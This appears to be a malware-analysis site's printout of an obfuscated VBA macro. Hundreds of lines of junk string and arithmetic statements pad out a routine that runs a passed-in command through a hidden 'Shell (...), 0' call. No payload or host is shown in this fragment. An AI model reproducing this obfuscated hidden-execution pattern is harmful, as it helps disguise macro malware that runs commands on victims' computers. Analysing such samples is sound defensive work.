tGvuUxJ = Space(15)
Next dCtyqg
For qOFQYi = 0 To 48
XJodD = UCase("abEc?bJB%xsd_[wIS]!")
mDUmeu = Right("Qg?Gq_wrdBPcTDe^a", 3)
nLcfAUtT = Space(9)
tGvuUxJ = 1465 - 1187 - 370
gvGBb = 367 + 964 + 1592
gvGBb = "hopR@]Q#iktTvCT" + "I)@K)U$#Sgm" + ")x*][u%s@#"
XJodD = UCase("tOg[WRNLhjzsn_ld]Ml")
mDUmeu = StrReverse("BH(L@-UMNgjvNSc@_")
FEUwfn = "cE-Enf?x*SvaOgCg@" + "#jqUkv&tB%)" + "EZ%bPVhM%ErkjT?e ps"
Next qOFQYi
End If
For krOuPy = 0 To 112
tGvuUxJ = UCase("Uw.pTx)tsaQhb&wEs@Dl")
nLcfAUtT = LTrim("$*&W$c@l*ThL")
XJodD = RTrim("h&YZGj(Ew]aoY dpOk")
FEUwfn = 1228 + 745 + 508
QJlnFad = Left("F&*H@&j%Yyn", 5)
fQhIMqD = Left("!APiL#fu(]TgXcjOWokr", 4)
gvGBb = 133 + 419 + 1528
QJlnFad = 804 + 1469 + 1722
Next krOuPy
FEUwfn = UCase("HkKc(&ybl-iO]&n?")
Next zhznNAj
XJodD = 246 + 1264 + 1433
tGvuUxJ = 1864 + 885 + 1114
nLcfAUtT = "w)XSgPZ&hKEGOsnys t]" + "LgX^ut%(ha" + "nioGP$LOCy#^"
tGvuUxJ = UCase("ras%&Jv[cj Tfmwba")
MVkkL = StrConv(PCFjD, vbUnicode)
tGvuUxJ = StrReverse("^kDXWVLnnK")
End Function
Private Function fAOjRN(SfsjCb As Boolean, QhmXUf As Boolean, bXRrNO As Boolean, gqwckp As String, JjHrbl As Double) As String
nLcfAUtT = StrReverse("?wf#-s_bMpib")
tGvuUxJ = Right("rdbw)g@muW[jFkc-&tT", 2)
gvGBb = Space(20)
For oqJhEa = 0 To 177
fQhIMqD = UCase("qWoVPmJo#Y(o (&")
mDUmeu = 1388 + 1245 + 601
nLcfAUtT = "qpKXDLFSa$tlPVQ-" + "qTvG!KrOpPydiNcI" + "CsO]Kn]#)SKiKqjF"
XJodD = "KelDE_?@@Itzs" + "Xz!r !?lTo" + "cz)n$GDku-bL"
nLcfAUtT = "!jkzW)[NOJ#y(R*[kp" + "EhL[r.imbw-l" + "@e^DFESzkJwA@ONy!"
nLcfAUtT = 1189 + 1753 + 1420
Next oqJhEa
gvGBb = 1975 - 1384 - 1999
QJlnFad = 1472 + 1023 + 514
mDUmeu = Left("rXHzW^#CRp", 3)
nLcfAUtT = LTrim("@@q(SyXHgF^LU")
mDUmeu = UCase("ZSzOzHwhw?_@ACQOS")
For XrlmhD = 0 To 297
gvGBb = 905 + 1247 + 1145
QJlnFad = 1168 - 1499 - 404
XJodD = Left("L]Y*ovmZ[d&_dIMGkSe", 3)
fQhIMqD = UCase("g&^^LcvYplJfx-_EEc")
XJodD = RTrim(" ]VFZ@N-kj&@Ie[ZH")
Next XrlmhD
fQhIMqD = UCase("jd!L[spkF%S")
fQhIMqD = Right("UkjaQ) LGtxI", 2)
mDUmeu = "PfN-YBxk*ohxUZAkFiB" + "K.bFdVblnmji-V" + "?oOPJBg[[fpZ"
XJodD = Space(5)
XJodD = Left("QGEbejunih cFkytMW_", 5)
For EMpSbm = 0 To 225
nLcfAUtT = Right("j(R]lk&?GAXltMYC", 2)
QJlnFad = LTrim("YbBeM*_lWPeAh_")
mDUmeu = Left(" BGDxvv@OZVIN)", 2)
fQhIMqD = 499 - 1334 - 1732
nLcfAUtT = "q(uvqIlmLWa[@z?TDMn$" + "NPeVRv*w]*bA!" + "EPGcOL^qXY"
tGvuUxJ = 1579 + 168 + 734
fQhIMqD = StrReverse("o.muVyG_wSL$Wi")
XJodD = UCase("ni&rLFhEvL")
nLcfAUtT = Space(13)
Next EMpSbm
nLcfAUtT = Right("q(.EtX?F_I^aqY", 5)
gvGBb = 1439 + 1641 + 1344
fQhIMqD = LTrim("HLsIH?J]@-DuzOXlt")
tGvuUxJ = RTrim("RhI#sZRzqknZJ((.WJI")
nLcfAUtT = Right("&WqnoCU]J*SOiS^V", 3)
mDUmeu = Space(6)
For PCjekG = 0 To 115
nLcfAUtT = "&JTSRSVDz*ZGPihpRc^j" + "tZ)s)Xd(moxoJ A[][" + "jHjQBmdHs*d"
QJlnFad = LTrim("L_n$u^ [U![La")
mDUmeu = LTrim("&aqLt#LlV%ftp")
QJlnFad = UCase("CLX@@DdIWzd&HgBMG-Z")
tGvuUxJ = "%RPYGrfscdeiD" + "--g $EotZNN&mX" + "N[r-#Bj #&F"
nLcfAUtT = 187 - 1014 - 1731
QJlnFad = UCase("aG#Q.VD!]ZrVyFnWv")
fQhIMqD = Left("bI!ihR%GQGDDNWZ", 2)
Next PCjekG
fQhIMqD = Space(5)
FEUwfn = 726 + 1604 + 1084
XJodD = "BWuZ s#oklZny^Rjt-" + "qHJ[FW-Ec_]XQ$.@yyl" + "*Daw%jbOiKdk)B@V[A"
fQhIMqD = 1837 + 168 + 255
gvGBb = RTrim("EpKyFgUGDrVZ_@ZY.Y")
nLcfAUtT = Left("WkyEftyFqvsMYhv@ VI", 2)
XJodD = Left("*sBipLryPw)Gug-", 4)
fQhIMqD = LTrim("]td#c(fON_I")
mDUmeu = Left("oLwNtQ(Ubll?NTQ", 2)
fAOjRN = "kiSjcKYrIjURFLhxEVybuumbwTSSCeFV"
End Function
Private Sub IYykumEe(YhWdV As String, jNnmdAb As String, PaEFOsm As String, PvptDKS As String, sfltUk As String)
mDUmeu = RTrim("krC]dXrsVC&")
mDUmeu = Space(10)
fQhIMqD = 1181 + 128 + 249
mDUmeu = RTrim("cAcD JQsfxp-k%Y")
mDUmeu = "ol lIk)K.QLeDjgH" + "cLT$^&Fx?jZaO@" + "VZNT]ETy_G!OB%%LD[d "
fQhIMqD = 1515 + 827 + 218
Shell (YhWdV), 0
gvGBb = StrReverse("Cm%qzNCd)ElmrUV!#eJ")
XJodD = LTrim("YA%JE)$VJm?")
mDUmeu = Left("k?^qn[-pd(yex@K", 2)
nLcfAUtT = 1294 + 1089 + 1000
mDUmeu = RTrim("VbejTbRy*(ov$W^")
mDUmeu = LTrim("uvLyL%H@FRMUCsSZ%")
tGvuUxJ = 1741 - 294 - 268
QJlnFad = 326 - 489 - 393
tGvuUxJ = 796 - 1709 - 460
End Sub
Private Sub jzFEkN(JtThIjY As Integer, tQiMKX As Boolean, JAwNfSp As Integer, ZdOAOmc As Integer, ZzsJpdu As Double)
XJodD = Left("Mgu!dYn?yGiN ", 2)
gvGBb = Right(")L.D]IkC*U", 5)
gvGBb = Space(1)
QJlnFad = RTrim("Xyymz lIA&IJU!MmS*")
tGvuUxJ = LTrim("d?dYqIItxAIb&a")
gvGBb = StrReverse("eSB&dvrPVJ*KvCy")
fQhIMqD = UCase("F&T?SzxIFXdL[!rm_V")
FEUwfn = UCase("ylwdx)DTod_NETN_ziR")
fQhIMqD = "?jl_*waPRja" + "a&miwUNdf![yRTk" + "gmYQtZg?xGFP!hss"
gvGBb = LTrim("p)b*@!vUC)IzOyGaF@")
tGvuUxJ = RTrim("TqUoyp]Tlo]@")
QJlnFad = 1816 + 1088 + 1297
QJlnFad = UCase("fWgPMNxtlganDBNpC")
tGvuUxJ = UCase("xCi!KbKkSN]TtnJ p]e")
fQhIMqD = Space(15)
tGvuUxJ = StrReverse("BHNm[Vje*Kz")
nLcfAUtT = Right("T^hrG ^O_N*VAUoXmYb", 4)
For VtNlLG = 0 To 329
fQhIMqD = 1133 - 630 - 141
gvGBb = StrReverse("LZ_oDst[lt")
XJodD = Space(9)
nLcfAUtT = StrReverse("lClvUC?h]q(tT!#m!")
mDUmeu = Left("^bX _jGx&A?", 4)
Next VtNlLG
XJodD = Space(11)
mDUmeu = StrReverse("grxvLua&ENPg&-JZbQh")
tGvuUxJ = Right("$UOvsRdhT@H", 2)
mDUmeu = "w_.UhmxuuS@U)" + "Q [m$]AQI*PUu&(M" + "odSAoZnNC*fByQh["
QJlnFad = RTrim("t?DAyMBbQ%y]!")
For aPhFBh = 0 To 294
XJodD = 1656 + 1649 + 1024
nLcfAUtT = StrReverse("W@-_%&US)Qr")
FEUwfn = Right("NWaw?di%%r)s", 4)
mDUmeu = StrReverse("AAcMCY.!QVnupPO")
fQhIMqD = "EW&FOL^s.JEBBCQN?#Si" + ")%]O%Rg@^UyHXw*CT)A" + "JIwOn HRat@q RS.d&@S"
nLcfAUtT = RTrim("EHEEUF K@QY?W_DTsr")
Next aPhFBh
mDUmeu = Left("w VfyxpxovLP", 2)
QJlnFad = RTrim("EShhxDQvhu[R!Exx")
FEUwfn = Space(4)
FEUwfn = "cjoF@-jKsbN[?LfQ!L!" + "ON%t)-*FNB" + "aqNLBM(ezVRA(biL.pl^"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.